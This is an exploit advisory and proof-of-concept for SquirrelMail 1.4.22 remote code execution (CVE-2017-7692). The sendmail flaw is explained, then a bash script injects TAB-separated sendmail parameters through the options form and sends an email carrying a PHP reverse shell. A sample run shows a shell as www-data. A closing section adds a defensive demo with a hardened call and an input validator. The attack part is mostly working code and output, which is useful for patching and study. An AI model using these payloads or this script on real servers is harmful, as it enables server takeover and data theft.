
SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)

Successful exploitation could let remote (authenticated) attackers gain access to the target server in the context of the web server account.

SquirrelMail allows authenticated users to control the envelopefrom (Return-Path) address of outgoing mail, and that address ends up on the sendmail command line.

#Squirrelmail webmail code#

```php
// save executed command for future reference
$this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";
$stream = popen(escapeshellcmd($this->sendmail_command), "w");
```

The code calls str_replace() to sanitize the user input in order to prevent the injection of additional parameters into the sendmail command. Unfortunately it does not take into account the \t (TAB) character, which can be used by attackers to inject additional parameters: escapeshellcmd() escapes shell metacharacters but leaves whitespace alone, and popen() hands the resulting string to /bin/sh, which splits it on tabs just as it does on spaces.

If the attacker sets their email address (Return-Path) in the options to their address followed by the TAB-separated parameters

```
-oQ/tmp/ -X/tmp/sqpoc
```

the sendmail program will be called with those arguments appended after -f, which will result in a /tmp/sqpoc file being created on disk with the email log (the -X parameter causes sendmail to save the debug/mail log into a file).

As demonstrated by the PoC exploit below, the attacker can also inject the -C parameter to provide a malicious sendmail config file, which can be uploaded beforehand as an attachment.

#PoC exploit#

The relevant part of the exploit script: it fetches the CSRF token (smtoken) from the options page, submits the injected address through the personal options form, and then sends an email to trigger the vulnerability. $URL, $sessid, $keyid, $squser, $payload, $phprevsh, $reverse_ip and $reverse_port are set earlier in the script.

```bash
echo -e "\n Injecting Sendmail command parameters"
token="`curl -s -b"SQMSESSID=$sessid key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1`"
curl -s -b"SQMSESSID=$sessid key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null \
    || { echo "Failed to inject sendmail parameters"; exit 1; }

# Send email which triggers the RCE vuln and runs phprevsh
echo -e "\n Sending the email to trigger the vuln"
(sleep 2s & curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &
echo -e "\n The test file should have been written at /tmp/sqpoc"
# error path of the original script (the response headers are saved in /tmp/sheaders)
# echo "There was a problem with sending email"
echo -e "\n Waiting for shell on $reverse_ip port $reverse_port"
```

The PHP reverse shell carried in the email body ($phprevsh) finishes by running the command file it wrote and removing it:

```php
system("/bin/bash /tmp/cmd; rm -f /tmp/cmd");
```

#Example run#

Output of the exploit against a test box, with a listener waiting on port 1337:

```
Logging in to SquirrelMail at
Uploading Sendmail config
2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)
Listening on (family 0, port 1337)
Connection from port 1337 accepted (family 2, sport 60608)
bash: cannot set terminal process group (12208): Inappropriate ioctl for device
uid=33(www-data) gid=33(www-data)
dpkg -l | grep squirrelmail
ii  squirrelmail  2:1.4.23~svn20120406-2ubuntu1.16.04.1  all  Webmail for
exit
```
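The following is an added example, not code from the advisory or from SquirrelMail. It reproduces the TAB argument injection described above in plain POSIX shell, which is what PHP's popen() hands the command string to: a fake sendmail (path from mktemp, assumed) records its argv, the vulnerable construction interpolates the envelope-from unquoted and runs it through sh -c, and a hardened variant keeps the address as a single argument. The sendmail_args value "-i -t", the sample address and the validator's character policy are assumptions, not SquirrelMail's own.

```shell
#!/bin/sh
# Fake sendmail that prints one argv entry per line (assumed path via mktemp).
FAKE_BIN="$(mktemp -d)"
cat > "$FAKE_BIN/sendmail" <<'EOF'
#!/bin/sh
for a in "$@"; do printf '%s\n' "$a"; done
EOF
chmod +x "$FAKE_BIN/sendmail"

# Mirror of the vulnerable construction: the command is built as one string with
# the envelope-from interpolated unquoted, then given to sh -c like popen() does.
# Prints the number of argv entries the fake sendmail received.
vulnerable_arg_count() {
    envelopefrom="$1"
    sendmail_command="$FAKE_BIN/sendmail -i -t -f$envelopefrom"   # "-i -t" assumed
    sh -c "$sendmail_command" | wc -l | tr -d ' '
}

# Hardened construction: same call, but the address is passed as a single argv
# entry so the shell never gets a chance to split it.
hardened_arg_count() {
    envelopefrom="$1"
    "$FAKE_BIN/sendmail" -i -t -f"$envelopefrom" | wc -l | tr -d ' '
}

# Validator (assumed policy): accept only a conservative address alphabet, so
# no whitespace, TAB or shell metacharacter reaches sendmail. 0 = ok, 1 = reject.
valid_envelope_from() {
    case "$1" in
        "") return 1 ;;
        *[!A-Za-z0-9._%+@-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Constructed sample inputs: a normal address, and the advisory's payload with
# real TAB separators (the character str_replace() fails to strip).
SAFE_FROM="user@example.test"
EVIL_FROM="$(printf 'user@example.test\t-oQ/tmp/\t-X/tmp/sqpoc')"

printf 'vulnerable, safe address : %s argv entries\n' "$(vulnerable_arg_count "$SAFE_FROM")"
printf 'vulnerable, TAB payload  : %s argv entries\n' "$(vulnerable_arg_count "$EVIL_FROM")"
printf 'hardened,   TAB payload  : %s argv entries\n' "$(hardened_arg_count "$EVIL_FROM")"
valid_envelope_from "$EVIL_FROM" || echo 'validator rejects the TAB payload'
```

With the TAB payload the vulnerable path hands sendmail five arguments (-i, -t, -fuser@example.test, -oQ/tmp/, -X/tmp/sqpoc) instead of three, which is exactly how the -X and -C options get smuggled in; quoting the argument, or rejecting the address up front, keeps the count at three.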
